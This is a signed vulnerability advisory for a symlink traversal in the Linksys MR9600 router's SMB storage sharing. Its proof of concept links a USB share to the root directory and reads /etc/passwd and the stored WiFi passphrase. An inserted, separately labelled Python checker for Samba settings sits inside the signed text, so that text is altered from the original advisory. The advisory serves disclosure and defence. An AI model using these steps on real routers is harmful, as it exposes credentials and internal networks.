-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID:               SYSS-2021-046
Product:                   Linksys Dual-Band Mesh-WLAN WiFi 6 Router (MR9600)
Manufacturer:              Linksys
Affected Version(s):       Firmware versions below 2.0.5
Tested Version(s):         Firmware version 2.0.5
Vulnerability Type:        Symlink Directory Traversal
Risk Level:                High
Solution Status:           Open
Manufacturer Notification: 2021-07-26
Solution Date:             --
Public Disclosure:         2022-02-16
CVE Reference:             Not yet assigned
Author of Advisory:        Dr. Matthias Kesenheimer, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The Linksys MR9600 is a Dual-Band WiFi 6 router manufactured by Linksys.
Among many other features, the router can expose attached storage media
as SMB shares on the network. This feature, also known as network-attached
storage (NAS), can be abused by an attacker to gain read access to the
router's complete internal file system.

Due to this issue, attackers are able to read sensitive configuration
files and password hashes, including the WiFi passphrase of the internal
network. This in turn carries the risk that an attacker who is only
connected to the guest network could gain access to the internal network.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

To exploit this issue, attackers require authenticated access to a
writable share. If there is no writable share on the network yet, an
attacker with physical access to the router can plug a specially
prepared USB storage device into one of the designated ports. The storage
device is then mounted automatically and made available on the network as
an SMB share.

By accessing the SMB share and creating a symbolic link that points to
the root directory, the whole file system is opened up to directory
traversal: the SMB service follows the link outside the share's own
directory tree instead of refusing it.

This issue may also be exploited through a writable share that is
accessible to guest accounts.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

To exploit this vulnerability, the following steps are required:

- Format a USB storage device to NTFS
- Create a symbolic link to the root directory via the command

  $ ln -d -s / slash

- Plug the USB storage device into a designated port and wait until the
  SMB share is available on the network
- Browse to the share and open the directory "slash"
- The complete internal file system should now be accessible via the
  symlink "slash"

The following examples show that full read permissions to the file
system exist:

$ cat slash/etc/passwd
root:x:0:0::/:/bin/sh
nobody:x:99:99:Nobody:/:/bin/nologin
sshd:x:22:22::/var/empty:/sbin/nologin
quagga:x:44:44:Quagga:/var/empty:/bin/nologin
firewall:x:66:66:Firewall:/var/empty:/bin/nologin
file_admin:x:999:999:Linux User,,,:/mnt/ftp:/bin/sh
admin:x:1000:0:File User,,,:/tmp/ftp/admin_mnt:/bin/sh
guest:x:1001:1001:File User,,,:/tmp/ftp/guest_mnt:/bin/sh

$ cat slash/tmp/wifi_virtual_settings.conf
[...]
wl0_ssid: Linksys-SySS
wl0_encryption: aes
wl0_passphrase: 5up3r53cur3p455w0rd
[...]
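The traversal above only works because the SMB service resolves a symbolic link that leaves the share's directory tree. The advisory does not name the SMB server in the firmware; the following is an added example (not part of the advisory and not Linksys code) that assumes the usual Linux case, Samba, and statically checks an smb.conf for the combination of settings that makes the "slash -> /" trick work. The sample configurations embedded in it are constructed for illustration, not taken from the router.

```python
"""Static check of a Samba smb.conf for shares on which a symbolic link can
be followed out of the share tree, the pattern behind the "slash -> /" PoC.

Semantics encoded here follow smb.conf(5):
  follow symlinks  (per share, default yes)  server resolves symlinks at all
  wide links       (per share, default no)   links may leave the share tree
  unix extensions  (global,    default yes)  when yes, Samba forces wide links
                                             off unless the global option
                                             "allow insecure wide links" is yes
"""
import configparser

TRUE_WORDS = {"yes", "true", "1", "on"}

# Constructed example configs (assumption: Samba; not taken from the router).
# RISKY_CONF mirrors the exposed setup, HARDENED_CONF the corrected one.
RISKY_CONF = """
[global]
   workgroup = WORKGROUP
   server string = Router NAS
   security = user
   map to guest = Bad User
   unix extensions = no

[usb]
   path = /tmp/mnt/usb
   read only = no
   guest ok = yes
   follow symlinks = yes
   wide links = yes

[usb_ro]
   path = /tmp/mnt/usb
   read only = yes
   wide links = yes
"""

HARDENED_CONF = """
[global]
   workgroup = WORKGROUP
   server string = Router NAS
   security = user
   map to guest = Bad User
   unix extensions = no

[usb]
   path = /tmp/mnt/usb
   read only = no
   guest ok = yes
   follow symlinks = no
   wide links = no
"""


def _as_bool(value, default):
    """Samba-style boolean; None means 'not set', so the default applies."""
    if value is None:
        return default
    return value.strip().lower() in TRUE_WORDS


def parse_smb_conf(text):
    """Return {section: {option: value}}, section and option names lower-cased.

    Lines are stripped first: Samba indents only for readability, whereas
    ConfigParser would treat deeper-indented lines as value continuations.
    """
    flat = "\n".join(line.strip() for line in text.splitlines())
    cp = configparser.ConfigParser(interpolation=None, strict=False,
                                   delimiters=("=",))
    cp.read_string(flat)
    return {name.lower(): dict(cp.items(name)) for name in cp.sections()}


def _share_writable(share, glob):
    """'read only' (default yes) and 'writable'/'writeable' are inverse
    synonyms; a share-level setting overrides the [global] one."""
    for scope in (share, glob):
        if "read only" in scope:
            return not _as_bool(scope["read only"], True)
        for key in ("writable", "writeable"):
            if key in scope:
                return _as_bool(scope[key], False)
    return False


def assess_share(conf, name):
    """Classify one share: can a link to / be resolved, and can a client
    plant such a link over SMB (i.e. without touching the USB stick)?"""
    glob = conf.get("global", {})
    share = conf[name]

    def opt(key, default):  # per-share option, falling back to [global]
        return _as_bool(share.get(key, glob.get(key)), default)

    unix_ext = _as_bool(glob.get("unix extensions",
                                 glob.get("smb1 unix extensions")), True)
    allow_insecure = _as_bool(glob.get("allow insecure wide links"), False)
    effective_wide = opt("wide links", False) and (not unix_ext or allow_insecure)
    escape = opt("follow symlinks", True) and effective_wide
    return {"symlink_escape": escape,
            "remote_plant": escape and _share_writable(share, glob)}


def find_exposed_shares(text):
    """Map every non-global share to its assessment."""
    conf = parse_smb_conf(text)
    return {n: assess_share(conf, n) for n in conf if n != "global"}


if __name__ == "__main__":
    for label, conf in (("risky", RISKY_CONF), ("hardened", HARDENED_CONF)):
        print(label, find_exposed_shares(conf))
```

Note the two results for the risky config: the read-only share `usb_ro` still resolves a link to `/` (the PoC plants the link offline on the USB stick, so share writability does not protect it), while only the writable `usb` share also lets a remote client create the link itself. Setting `wide links = no` (or `follow symlinks = no`) on the share, and leaving `unix extensions` at its default without `allow insecure wide links`, is what the hardened variant does.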
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

More information:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2021-07-06: Vulnerability discovered
2021-07-26: Vulnerability reported to manufacturer
2021-08-16: Manufacturer responded with promise to provide feedback
2021-09-10: Asked again for the current status
2021-09-10: Manufacturer states that the problem is being worked on with vigor
2021-10-08: Asked again for the current status
2021-10-28: Manufacturer still did not provide a satisfactory answer
2022-02-01: Notice of upcoming publication communicated

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website
    https://www.linksys.com/mesh-routers/linksys-dual-band-mesh-wifi-6-router-mr9600/p/p-mr9600/
[2] SySS Security Advisory SYSS-2021-046
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-046.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Dr. Matthias Kesenheimer of
SySS GmbH.

E-Mail: matthias.kesenheimer@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Matthias_Kesenheimer.asc
Key ID: 0x15E203385E96D04E
Key Fingerprint: B259 18D6 49F6 FD35 8F5E 485E 15E2 0338 5E96 D04E

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQGzBAEBCgAdFiEEslkY1kn2/TWPXkheFeIDOF6W0E4FAmH5A6IACgkQFeIDOF6W
0E44MQwAxE0tTcVP2DCSacobITkKG1zFGB9gOeFKbQavdfsBnq4QJiNjV26KvIeu
RUQkOs+G6vHVNTUFfoLwUJEjfjklhcpvZj0CQK8OfrMWCym8Bsh6oEg9xsf/zSZd
l9JQOanOHY7c/+OS85hcU4/Vo6ol1sK7kCHuI/buHx2pBp5NtkYaKuE9YRhuJKiZ
9XPydxua9xmZzxq2PFDD7wl5sTsLu/bH9KD0jOCW4suk2M43lk3J4AdWzPYIkurX
L64e2IbF9Cdhmto+s5iBDQht762P+8ZDLIVVm/bG3+9ns6a4/yjgCu+XLPOKVo2s
QGShMvJw/EOJ8uxgiYVsbtWneO+/X898iudtS/H1xmkUnpKINuXecq7RWKA4rElt
ZKDLpGPdUtgrFUb7OHn67WV5J6APOV8nDSNfJqucoNPrDjFeYXKGkLbnMx6oa6x0
2n2my5H7hMNlguX0tvA/3kU7O0TFwzLwNtKVslIqCWTtw57EB8nsmyGIsia52UIG
MgYu+CQy
=lk2V
-----END PGP SIGNATURE-----